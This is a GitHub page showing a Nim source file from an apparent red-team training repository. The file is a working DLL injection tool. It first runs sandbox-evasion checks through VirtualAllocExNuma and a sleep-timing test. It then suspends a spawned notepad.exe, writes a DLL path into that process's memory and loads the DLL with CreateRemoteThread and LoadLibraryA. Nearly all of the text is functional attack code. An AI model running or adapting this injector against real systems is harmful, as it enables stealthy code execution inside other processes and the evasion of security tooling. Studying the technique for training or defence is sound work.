-
Notifications
You must be signed in to change notification settings - Fork 23
/
Copy pathdll.nim
74 lines (60 loc) · 2.17 KB
/
dll.nim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import winim/lean, std/osproc, std/times
let
dll_path: LPCSTR = "C:\\Users\\svrat\\Documents\\Red-Team-Advent-of-Code\\18_DllInject\\create_file.dll";
when isMainModule:
echo "[+] Running sandbox evasion using the non-emulated API VirtualAllocExNuma";
let mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 0x1000, 0x3000, 0x4, 0);
if mem == nil:
echo "[-] (VirtualAllocExNuma) Failed check"
quit(0)
echo "[+] Delay of three seconds for scan bypass check"
let time = cpuTime()
Sleep(3000);
let time_now = cpuTime()
if time_now - time < 2.5:
echo "[-] (Sleep) Failed check"
quit(0)
let injectedProc = startProcess("notepad.exe")
injectedProc.suspend()
echo "[*] Suspended process: ", injectedProc.processID
let processHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](injectedProc.processID)
)
echo "[*] Injected proc handle: ", processHandle
echo "[*] Allocating memory for dllpath in the target process"
let dllMemoryPath = VirtualAllocEx(
processHandle,
NULL,
cast[SIZE_T](dll_path.len + 1),
MEM_COMMIT,
PAGE_READWRITE
)
var bytesWritten: SIZE_T
let writeProcess = WriteProcessMemory(
processHandle,
dllMemoryPath,
cast[LPVOID](dll_path),
cast[SIZE_T](dll_path.len + 1),
addr bytesWritten
)
echo "[*] WriteProcessMemory: ", bool(writeProcess)
echo " \\-- bytes written: ", bytesWritten
echo ""
let load_dll_func = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA") #, dllMemoryPath, 0, 0)
let threadHandle = CreateRemoteThread(
processHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](load_dll_func),
dllMemoryPath,
0,
NULL
)
echo "[+] Thread Handle: ", threadHandle
WaitForSingleObject(threadHandle, INFINITE);
echo "[*] DLL loaded"
echo "[!] Press enter to free memory and exit"
discard stdin.readLine()
VirtualFreeEx(threadHandle, dllMemoryPath, len(dll_path) + 1, MEM_RELEASE);